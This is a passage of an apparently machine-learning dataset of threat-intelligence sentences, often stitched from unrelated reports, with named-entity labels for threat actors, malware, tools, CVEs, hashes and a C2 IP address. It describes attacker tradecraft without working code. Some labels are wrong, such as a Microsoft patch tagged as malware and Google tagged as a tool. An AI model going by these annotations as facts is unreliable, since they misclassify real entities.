A survey conducted by security firm OneLogin found that only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications .", "spans": {"ORGANIZATION: Kaspersky Lab": [[126, 139], [168, 181]], "ORGANIZATION: OneLogin": [[474, 482]], "VULNERABILITY: only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications": [[494, 626]]}, "info": {"id": "cyberner_stix_train_006187", "source": "cyberner_stix_train"}} {"text": "% d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": {"THREAT_ACTOR: Shun Wang": [[333, 342]], "THREAT_ACTOR: FIN6": [[623, 627]]}, "info": {"id": "cyberner_stix_train_006188", "source": "cyberner_stix_train"}} {"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . 
Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]], "TOOL: mimikatz": [[100, 108]], "TOOL: PwDump": [[112, 118]], "TOOL: DLL load order hijacking": [[137, 161]]}, "info": {"id": "cyberner_stix_train_006189", "source": "cyberner_stix_train"}} {"text": "Base85 encoding is usually used on pdf and postscript documents . The configuration of the malware is stored in custom preferences files , using the same obfuscation scheme . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The C2 server 199.247.6.253 is known to be used by the Rancor group . The first path ( /Library / Fonts / ArialUnicode.ttf.md5 ) stores the backdoor ’s full configuration , including its C2 servers .", "spans": {"THREAT_ACTOR: Molerats": [[195, 203]], "ORGANIZATION: governmental": [[212, 224]], "ORGANIZATION: embassies": [[265, 274]], "ORGANIZATION: aerospace": [[296, 305]], "ORGANIZATION: defence Industries": [[310, 328]], "ORGANIZATION: financial institutions": [[331, 353]], "ORGANIZATION: journalists": [[356, 367]], "ORGANIZATION: software developers": [[370, 389]], "TOOL: C2": [[396, 398]], "IP_ADDRESS: 199.247.6.253": [[406, 419]], "THREAT_ACTOR: Rancor": [[447, 453]]}, "info": {"id": "cyberner_stix_train_006190", "source": "cyberner_stix_train"}} {"text": "Conclusion The days when one needed in-depth coding knowledge to develop malware are long gone . Since at least 2011 , these hackers have been using malware to spy on corporate networks . 
CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program .", "spans": {"THREAT_ACTOR: hackers": [[125, 132]], "TOOL: malware": [[149, 156]], "THREAT_ACTOR: CopyKittens": [[188, 199]], "MALWARE: TDTESS backdoor": [[334, 349]], "MALWARE: Vminst": [[352, 358]], "MALWARE: NetSrv": [[387, 393]], "MALWARE: Cobalt Strike loader": [[398, 418]], "MALWARE: ZPP": [[425, 428]]}, "info": {"id": "cyberner_stix_train_006191", "source": "cyberner_stix_train"}} {"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The following is a technical analysis of this variant .", "spans": {"ORGANIZATION: ByteDance": [[20, 29]], "MALWARE: AutoHotKey scripts": [[149, 167]]}, "info": {"id": "cyberner_stix_train_006192", "source": "cyberner_stix_train"}} {"text": "The second-stage malware is delivered to different destinations with an autorun registry key set respectively .", "spans": {}, "info": {"id": "cyberner_stix_train_006193", "source": "cyberner_stix_train"}} {"text": "Kill any running process and attempt to delete the associated executable . 
“ Setup ” command – sends various info about the machine with each iteration of the C2 communications loop .", "spans": {"TOOL: C2": [[159, 161]]}, "info": {"id": "cyberner_stix_train_006194", "source": "cyberner_stix_train"}} {"text": "The Sofacy group should no longer be an unfamiliar threat at this stage .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_006195", "source": "cyberner_stix_train"}} {"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) . The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by OceanLotus to load older versions of Remy backdoor . the malware uses and to get the function Address .", "spans": {"ORGANIZATION: CTU": [[159, 162]], "THREAT_ACTOR: threat actors": [[217, 230]], "THREAT_ACTOR: COBALT GYPSY": [[279, 291]], "THREAT_ACTOR: threat group": [[292, 304]], "THREAT_ACTOR: Threat Group-2889": [[324, 341]], "TOOL: Veil": [[410, 414]], "TOOL: shellcode_inject": [[417, 433]], "THREAT_ACTOR: OceanLotus": [[465, 475]], "MALWARE: Remy backdoor": [[502, 515]], "MALWARE: the malware": [[518, 529]]}, "info": {"id": "cyberner_stix_train_006196", "source": "cyberner_stix_train"}} {"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . 
Letter allegedly from the Barcelona B-IDTY branch E-LOC of the SysUpdate has been in use by Budworm since at least 2020 , and the attackers appear to continually develop the tool to improve its capabilities and avoid detection .", "spans": {"MALWARE: Backdoor.Nidiran": [[227, 243]], "MALWARE: SysUpdate": [[409, 418]], "THREAT_ACTOR: Budworm": [[438, 445]], "THREAT_ACTOR: attackers": [[476, 485]]}, "info": {"id": "cyberner_stix_train_006197", "source": "cyberner_stix_train"}} {"text": "Quite possibly , this routine targets older platforms like Windows 7 and machines not taking advantage of hardware protections like UEFI and SecureBoot , available on Windows 10 . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed . OceanLotus : 0 4 name is read from resource P1/0x64 . Symantecs Threat Hunter Team , part of Broadcom , has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a targets network and then switched to 3AM when LockBit was blocked .", "spans": {"SYSTEM: Windows 7": [[59, 68]], "SYSTEM: Windows 10": [[167, 177]], "THREAT_ACTOR: group": [[256, 261]], "ORGANIZATION: defense contractors": [[312, 331]], "THREAT_ACTOR: OceanLotus": [[379, 389]], "ORGANIZATION: Symantecs Threat Hunter Team": [[433, 461]], "ORGANIZATION: Broadcom": [[472, 480]], "THREAT_ACTOR: ransomware affiliate": [[524, 544]], "MALWARE: LockBit": [[570, 577], [629, 636]], "MALWARE: 3AM": [[620, 623]]}, "info": {"id": "cyberner_stix_train_006198", "source": "cyberner_stix_train"}} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . 
Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": {"MALWARE: malware": [[5, 12]], "THREAT_ACTOR: Barium": [[135, 141]], "MALWARE: Win32/RibDoor.A!dha": [[225, 244]]}, "info": {"id": "cyberner_stix_train_006199", "source": "cyberner_stix_train"}} {"text": "Where possible , we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns .", "spans": {"THREAT_ACTOR: TA505": [[110, 115]]}, "info": {"id": "cyberner_stix_train_006200", "source": "cyberner_stix_train"}} {"text": "Various versions may also change the index of the split ( e.g . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware . ZXNC Run ZXNC v1.1 – a simple telnet client . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"ORGANIZATION: telecommunications providers": [[131, 159]], "TOOL: Leouncia malware": [[165, 181]], "VULNERABILITY: previous work exposed publicly": [[395, 425]]}, "info": {"id": "cyberner_stix_train_006201", "source": "cyberner_stix_train"}} {"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 . APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos . 
To hide their true location , the threat actor used the ExpressVPN service that showed connections to the web shell ( Notice.php ) on a compromised server coming from two IP addresses in London .", "spans": {"TOOL: Bankshot": [[179, 187]], "THREAT_ACTOR: APT33": [[228, 233]], "MALWARE: e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos": [[236, 314]], "THREAT_ACTOR: threat actor": [[351, 363]], "SYSTEM: ExpressVPN service": [[373, 391]], "TOOL: web shell ( Notice.php )": [[423, 447]]}, "info": {"id": "cyberner_stix_train_006202", "source": "cyberner_stix_train"}} {"text": "With a better understanding of the “ Agent Smith ” actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor ’ s unusual practices in choosing targets . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . One of the tactics used in operations by these groups is highly targeted spear-phishing messages . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": {"MALWARE: Agent Smith": [[37, 48]], "ORGANIZATION: Popular tax preparation software companies": [[484, 526]], "ORGANIZATION: lawmakers": [[547, 556]], "TOOL: Google": [[636, 642]], "TOOL: Meta": [[647, 651]]}, "info": {"id": "cyberner_stix_train_006203", "source": "cyberner_stix_train"}} {"text": "] databit [ . It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated . A recently observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib . 
In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": {"THREAT_ACTOR: Mofang group": [[43, 55]], "FILEPATH: 832f5e01be536da71d5b3f7e41938cfb": [[182, 214]], "MALWARE: Aumlib": [[253, 259]]}, "info": {"id": "cyberner_stix_train_006204", "source": "cyberner_stix_train"}} {"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": {"MALWARE: Microsoft Word documents": [[292, 316]], "VULNERABILITY: CVE-2017-0199": [[328, 341]], "THREAT_ACTOR: Lazarus": [[373, 380]]}, "info": {"id": "cyberner_stix_train_006205", "source": "cyberner_stix_train"}} {"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemetry blindspot in many enterprises , as is with Penquin Turla and APT28 ’s Linux XAgent variant .", "spans": {"SYSTEM: Android": [[79, 86]], "THREAT_ACTOR: Buckeye": [[118, 125]], "TOOL: Equation Group tools": [[173, 193]], "TOOL: OS": [[274, 276]], "MALWARE: Penquin Turla": [[431, 444]], "THREAT_ACTOR: APT28": [[449, 454]], "SYSTEM: Linux": [[458, 463]], "TOOL: XAgent": [[464, 470]]}, "info": {"id": "cyberner_stix_train_006206", "source": "cyberner_stix_train"}} {"text": "However , within six months the malicious actors added the capability to infect iOS devices . 
According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": {"SYSTEM: iOS": [[80, 83]], "MALWARE: Okrum": [[123, 128]], "THREAT_ACTOR: Lazarus Group": [[303, 316]], "MALWARE: KillDisk": [[322, 330]]}, "info": {"id": "cyberner_stix_train_006207", "source": "cyberner_stix_train"}} {"text": "In 2016 , Unit 42 launched an unprecedented analytic effort focused on developing a modern assessment of the size , scope and complexity of this threat . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "THREAT_ACTOR: HELIX KITTEN actors": [[169, 188]], "ORGANIZATION: personnel": [[324, 333]]}, "info": {"id": "cyberner_stix_train_006208", "source": "cyberner_stix_train"}} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "FILEPATH: Catchamas": [[173, 182]], "MALWARE: Trojan": [[195, 201]]}, "info": {"id": "cyberner_stix_train_006209", "source": "cyberner_stix_train"}} {"text": "As of this publication , 40 of the links have been clicked at least once .", "spans": {}, "info": {"id": "cyberner_stix_train_006210", "source": "cyberner_stix_train"}} {"text": "All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C .", "spans": {"THREAT_ACTOR: Outlaw": [[123, 129]], "TOOL: C&C": [[153, 156]]}, "info": {"id": "cyberner_stix_train_006211", "source": "cyberner_stix_train"}} {"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": {"THREAT_ACTOR: APT12": [[241, 246], [296, 301]], "MALWARE: THREEBYTE": [[267, 276], [365, 374]], "MALWARE: Cyclops Blink": [[377, 390]], "MALWARE: DarkVishnya": [[485, 496]]}, "info": {"id": "cyberner_stix_train_006212", "source": "cyberner_stix_train"}} {"text": "The command is a constructed string split into three parts using \" \" as a separator . ScarCruft infected this victim on September 21 , 2018 . 
The resulting screenshot is saved at “ %TMP%/image.png ” , sent back to the attackers by the GRIFFON implant and then deleted . As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": {"THREAT_ACTOR: ScarCruft": [[86, 95]], "FILEPATH: %TMP%/image.png": [[181, 196]], "MALWARE: GRIFFON": [[235, 242]], "ORGANIZATION: Nick Biasini": [[273, 285]], "ORGANIZATION: Talos Takes": [[317, 328]]}, "info": {"id": "cyberner_stix_train_006213", "source": "cyberner_stix_train"}} {"text": "If these files successfully gain root rights , the Trojan will install several tools into the system . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": {"DOMAIN: Bit.ly": [[417, 423]], "ORGANIZATION: FireEye": [[560, 567]], "VULNERABILITY: Adobe Reader 0 - day exploit": [[598, 626]]}, "info": {"id": "cyberner_stix_train_006214", "source": "cyberner_stix_train"}} {"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell . 
WildFire properly classifies BBSRAT malware samples as malicious .", "spans": {"ORGANIZATION: WildFire": [[167, 175]], "MALWARE: BBSRAT malware samples": [[196, 218]]}, "info": {"id": "cyberner_stix_train_006216", "source": "cyberner_stix_train"}} {"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia . The malware then uses WebDAV to upload the RAR archive to a Box account . The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": {"MALWARE: malware": [[99, 106]], "TOOL: WebDAV": [[117, 123]], "MALWARE: RAR archive": [[138, 149]]}, "info": {"id": "cyberner_stix_train_006217", "source": "cyberner_stix_train"}} {"text": "Finally , the malware sends the act=done value and return code .", "spans": {}, "info": {"id": "cyberner_stix_train_006218", "source": "cyberner_stix_train"}} {"text": "The encryption keys in the script were different on every system .", "spans": {}, "info": {"id": "cyberner_stix_train_006219", "source": "cyberner_stix_train"}} {"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": {"TOOL: DDoS malware": [[0, 12]], "MALWARE: Bookworm": [[170, 178]], "TOOL: C2": [[322, 324]]}, "info": {"id": "cyberner_stix_train_006220", "source": "cyberner_stix_train"}} {"text": "“ tk1 ” will disable all the effects of the “ tk0 ” command , while “ input keyevent 3 ” is the shell command that simulates the pressing of the ‘ home ’ button so all the current activities will be minimized and the user won ’ t suspect anything . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . 
APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos . Most recently , the Ransomware and Financial Stability Act was introduced .", "spans": {"VULNERABILITY: CVE-2018-4878": [[288, 301]], "THREAT_ACTOR: attacker": [[314, 322]], "THREAT_ACTOR: APT33": [[370, 375]], "MALWARE: 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos": [[378, 456]]}, "info": {"id": "cyberner_stix_train_006221", "source": "cyberner_stix_train"}} {"text": "After thorough analysis we can confirm that Cerberus was indeed not based on the Anubis source code . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"MALWARE: Cerberus": [[44, 52]], "MALWARE: Anubis": [[81, 87]], "ORGANIZATION: Kaspersky": [[121, 130]], "ORGANIZATION: Cylance": [[158, 165]], "THREAT_ACTOR: Machete": [[180, 187]], "THREAT_ACTOR: APT38": [[305, 310]], "ORGANIZATION: banks": [[356, 361]], "ORGANIZATION: financial institutions": [[372, 394]]}, "info": {"id": "cyberner_stix_train_006222", "source": "cyberner_stix_train"}} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . 
This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]], "MALWARE: Green Lambert": [[220, 233]], "MALWARE: Blue": [[268, 272]]}, "info": {"id": "cyberner_stix_train_006223", "source": "cyberner_stix_train"}} {"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware . Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . When executed , the SFX archive will be extracted and the “ 8957.cmd ” will be run . 
CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for • None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services • None Consider application - level controls such as web application firewalls .", "spans": {"THREAT_ACTOR: Night Dragon": [[100, 112]], "ORGANIZATION: social engineering": [[138, 156]], "TOOL: remote administration tools": [[309, 336]], "TOOL: RATs": [[339, 343]], "ORGANIZATION: oil and gas": [[468, 479]], "TOOL: SFX archive": [[528, 539]], "FILEPATH: 8957.cmd": [[568, 576]], "TOOL: CrowdStrike Falcon": [[593, 611]], "SYSTEM: Monitor Exchange servers": [[739, 763]], "ORGANIZATION: CrowdStrike Services": [[863, 883]]}, "info": {"id": "cyberner_stix_train_006224", "source": "cyberner_stix_train"}} {"text": "The lure text in the phishing email claims the attachment is a calendar of events relevant to the targeted organizations and contained specific instructions regarding the actions the victim would have to take if they had “ trouble viewing the document ” .", "spans": {}, "info": {"id": "cyberner_stix_train_006225", "source": "cyberner_stix_train"}} {"text": "The Association of State Scientific Centers “ Nauka , ” which coordinates 43 Scientific Centers of the Russian Federation ( SSC RF ) .", "spans": {"ORGANIZATION: The Association of State Scientific Centers": [[0, 43]], "ORGANIZATION: Nauka": [[46, 51]], "ORGANIZATION: Scientific Centers": [[77, 95]], "ORGANIZATION: Russian Federation": [[103, 121]], "ORGANIZATION: SSC": [[124, 127]], "ORGANIZATION: RF": [[128, 130]]}, "info": {"id": "cyberner_stix_train_006226", "source": "cyberner_stix_train"}} {"text": "The shellcode downloads the next stage payload , which is an executable passed in plaintext , to the temp directory with UrlDownloadToFileA , which it then runs with WinExec .", "spans": {"TOOL: shellcode": [[4, 13]]}, 
"info": {"id": "cyberner_stix_train_006227", "source": "cyberner_stix_train"}} {"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices . Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia . This time , two games and one gaming platform application were compromised to include a backdoor . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": {"SYSTEM: Verify Apps": [[48, 59]], "MALWARE: Chrysaor": [[105, 113]], "TOOL: THC Hydra": [[226, 235]], "THREAT_ACTOR: Leafminer": [[239, 248]]}, "info": {"id": "cyberner_stix_train_006228", "source": "cyberner_stix_train"}} {"text": "Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . 
ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "MALWARE: (K3A.Platform.dll)": [[82, 100]], "THREAT_ACTOR: ScarCruft": [[178, 187]], "TOOL: Flash Player": [[226, 238]], "VULNERABILITY: exploit": [[239, 246]], "VULNERABILITY: CVE-2016-4117": [[249, 262]]}, "info": {"id": "cyberner_stix_train_006229", "source": "cyberner_stix_train"}} {"text": "A company in the chemical industry .", "spans": {"ORGANIZATION: A company in the chemical industry": [[0, 34]]}, "info": {"id": "cyberner_stix_train_006230", "source": "cyberner_stix_train"}} {"text": "Table 4 below lists the intents that are statically registered in this HenBox variant ’ s AndroidManifest.xml config file , together with a description of what that intent does , and when it would be used . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"MALWARE: HenBox": [[71, 77]], "THREAT_ACTOR: APT41": [[207, 212]], "ORGANIZATION: video game sector": [[251, 268]], "THREAT_ACTOR: APT28": [[391, 396]], "ORGANIZATION: WADA": [[414, 418]]}, "info": {"id": "cyberner_stix_train_006231", "source": "cyberner_stix_train"}} {"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . 
The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"MALWARE: GRIFFON": [[35, 42]], "TOOL: dynamic-link library": [[232, 252]], "TOOL: DLL": [[255, 258]], "FILEPATH: sidebar.exe": [[340, 351]], "FILEPATH: dllhost.exe": [[363, 374]]}, "info": {"id": "cyberner_stix_train_006232", "source": "cyberner_stix_train"}} {"text": "FAKESPY CODE ANALYSIS Once the user clicks on the malicious link from the SMS message , the app asks them to approve installation from unknown resources . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . On much of the C2 infrastructure we identified several crimeware family samples .", "spans": {"MALWARE: FAKESPY": [[0, 7]], "ORGANIZATION: FireEye Labs": [[193, 205]], "TOOL: PICKPOCKET": [[271, 281]], "THREAT_ACTOR: APT34": [[323, 328]], "TOOL: C2": [[346, 348]]}, "info": {"id": "cyberner_stix_train_006233", "source": "cyberner_stix_train"}} {"text": "But attackers were still constantly looking for new methods to steal TANs . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": {"THREAT_ACTOR: threat actor": [[149, 161]], "ORGANIZATION: specific individuals": [[201, 221]], "ORGANIZATION: Mandiant": [[317, 325]]}, "info": {"id": "cyberner_stix_train_006234", "source": "cyberner_stix_train"}} {"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests . 
The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 . Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , “ exercise strict oversight on CISA ’s efforts ” to implement many of the policies outlined .", "spans": {"ORGANIZATION: development company": [[255, 274]], "MALWARE: CONFUCIUS_A": [[289, 300]], "MALWARE: CONFUCIUS_B": [[305, 316]], "MALWARE: Dexphot": [[319, 326]], "FILEPATH: 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5": [[329, 393]], "ORGANIZATION: U.S. House": [[434, 444]], "ORGANIZATION: Biden administration": [[470, 490]]}, "info": {"id": "cyberner_stix_train_006235", "source": "cyberner_stix_train"}} {"text": "Remote Template Hashes :", "spans": {"TOOL: Remote Template": [[0, 15]]}, "info": {"id": "cyberner_stix_train_006236", "source": "cyberner_stix_train"}} {"text": "Microsoft researchers used a combination of anomaly detection and supervised machine learning to reduce the data set and separate meaningful , malware-related anomalies from benign data .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "TOOL: anomaly detection": [[44, 61]], "TOOL: supervised machine learning": [[66, 93]]}, "info": {"id": "cyberner_stix_train_006237", "source": "cyberner_stix_train"}} {"text": "Installing apps on the system partition makes it harder for the user to remove the app . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler . 
It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"ORGANIZATION: Kaspersky Lab": [[89, 102]], "TOOL: NetTraveler Toolkit": [[189, 208]], "TOOL: Trojan-Spy.Win32.TravNet": [[221, 245]], "TOOL: Downloader.Win32.NetTraveler": [[250, 278]], "THREAT_ACTOR: APT16": [[328, 333]], "MALWARE: ELMER backdoor": [[474, 488]], "VULNERABILITY: CVE-2023 - 37450": [[540, 556]]}, "info": {"id": "cyberner_stix_train_006238", "source": "cyberner_stix_train"}} {"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": {"THREAT_ACTOR: SLUB": [[22, 26]], "VULNERABILITY: CVE-2018-8174": [[81, 94]], "FILEPATH: Bemstour": [[131, 139]]}, "info": {"id": "cyberner_stix_train_006239", "source": "cyberner_stix_train"}} {"text": "Both backdoors ( internally referred to by their authors as “ BastionSolution ” and “ OneDriveSolution ” ) essentially allow the operator to remotely execute commands on the compromised machine .", "spans": {"MALWARE: BastionSolution": [[62, 77]], "MALWARE: OneDriveSolution": [[86, 102]]}, "info": {"id": "cyberner_stix_train_006240", "source": "cyberner_stix_train"}} {"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint ’ s rich set of tools for detection , investigation , and 
response . Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" . Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes . Indicators of compromise aid information security and IT professionals in detecting data breaches , malware infections , or other threat activity .", "spans": {"SYSTEM: Microsoft Defender": [[51, 69], [253, 271]], "ORGANIZATION: Microsoft Defender Security Center": [[103, 137]], "SYSTEM: Windows": [[219, 226]], "ORGANIZATION: FireEye": [[403, 410]]}, "info": {"id": "cyberner_stix_train_006241", "source": "cyberner_stix_train"}} {"text": "The server ’ s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": {"THREAT_ACTOR: PLATINUM": [[135, 143]], "VULNERABILITY: zero-day exploits": [[178, 195]], "THREAT_ACTOR: APT10": [[290, 295], [504, 509]], "THREAT_ACTOR: actors": [[396, 402]]}, "info": {"id": "cyberner_stix_train_006242", "source": "cyberner_stix_train"}} {"text": "ANTI-EMULATOR TECHNIQUES FakeSpy appears to use multiple techniques to evade detection via the emulator . In addition , during the 